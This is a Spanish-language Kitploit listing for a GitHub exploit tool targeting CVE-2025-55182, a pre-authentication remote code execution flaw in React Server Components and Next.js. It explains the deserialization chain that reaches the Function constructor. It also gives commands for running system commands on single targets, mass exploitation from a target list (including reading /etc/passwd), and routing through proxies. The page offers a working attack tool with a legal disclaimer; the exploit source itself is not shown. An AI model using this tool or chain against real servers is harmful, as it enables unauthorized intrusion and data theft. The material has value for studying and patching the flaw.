Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 | Kitploit
Herramientas/GitHubGitHub/luoluoqingge/cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubluoluoqingge/cve-2025-55182

CVE-2025-55182

Ver Repositorio
1hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182 - React2Shell

React Server Components / Next.js Ejecución Remota de Código Pre-Autenticación

CampoValor
CVE IDCVE-2025-55182
CVSS10.0 (Crítico)
CWECWE-502: Deserialización de Datos No Confiables
TipoRCE Pre-Auth

Alcance de Impacto

ComponenteVersiones Afectadas
React19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6
Paquetes relacionadosreact-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel

Principio de la Vulnerabilidad

Esta vulnerabilidad explota una falla de deserialización en el protocolo Flight de React Server Components (RSC), logrando ejecución remota de código no autorizada mediante la construcción de una solicitud maliciosa multipart/form-data. La cadena de explotación completa es la siguiente:

  1. Se activa la ruta de Server Action mediante POST multipart/form-data junto con la cabecera Next-Action
  2. El Chunk "0" contiene un objeto JSON cuidadosamente construido (no envuelto en un array); $1:__proto__:then accede a Chunk.prototype.then en el objeto del Chunk 1 en estado PENDING, convirtiéndolo en un thenable
  3. $1:constructor:constructor se resuelve a través de la cadena de prototipos hasta el constructor Function
  4. Chunk.prototype.then llama a initializeModelChunk para resolver el campo value '{"then":"$B0"}'
  5. La resolución del blob $B0 invoca _formData.get(_prefix + "0"), es decir, Function(code + "0")

Instalación de Dependencias

root@kitploit:~
pip install requests[socks]

El script intentará instalar automáticamente requests y PySocks si faltan dependencias.

Uso

RCE en un Solo Objetivo

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id"

Explotación Masiva

root@kitploit:~
python CVE-2025-55182.py -f targets.txt -c "cat /etc/passwd" -o results.txt

Solo Detección de Vulnerabilidad (sin ejecutar comandos)

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 --check
python CVE-2025-55182.py -f targets.txt --check -o vuln_hosts.txt

Uso de Proxy

root@kitploit:~
# Proxy HTTP
python CVE-2025-55182.py -u http://target:3000 -c "whoami" --proxy http://127.0.0.1:8080

# Proxy SOCKS5
python CVE-2025-55182.py -f targets.txt -c "id" --proxy socks5://127.0.0.1:1080

Modo Depuración

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id" -v

Descripción Completa de Parámetros

Descripción de la Salida

  • VULN — El objetivo es vulnerable, se obtuvo exitosamente el resultado de la ejecución del comando
  • MAYBE — Posiblemente vulnerable (p. ej., tiempo de espera de lectura)
  • ERR — Error de conexión
  • SAFE — No se detectó vulnerabilidad

Los resultados del escaneo masivo se escriben en el archivo de salida especificado por -o, registrando únicamente los objetivos confirmados como vulnerables.

Ejemplo de Formato de targets.txt

root@kitploit:~
http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# Las líneas de comentario se ignoran

Aviso Legal

Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines de investigación de seguridad. El usuario debe asegurarse de contar con la autorización explícita del propietario del sistema objetivo. Realizar pruebas de penetración sin autorización constituye una actividad ilegal, y el usuario asume toda la responsabilidad legal correspondiente.

Descargar herramienta
  • El objeto de función devuelto posee una propiedad then, se considera un thenable y se invoca, desencadenando la ejecución de código y logrando RCE
  • ParámetroDescripciónValor Predeterminado
    -u, --urlURL de un solo objetivo (mutuamente excluyente con -f)-
    -f, --fileArchivo con lista de URLs objetivo, una por línea (mutuamente excluyente con -u)-
    -c, --commandComando del sistema a ejecutar (no requerido en modo --check)-
    -o, --outputArchivo de salida de resultadosresults.txt
    -t, --threadsNúmero de hilos concurrentes10
    -v, --verboseMostrar salida de depuraciónFalse
    --proxyDirección del proxy, soporta HTTP y SOCKS5-
    --timeoutTiempo de espera de la solicitud (segundos)15
    --checkSolo detectar vulnerabilidad, sin ejecutar comandos del sistemaFalse
    --verify-sslVerificar certificados TLSFalse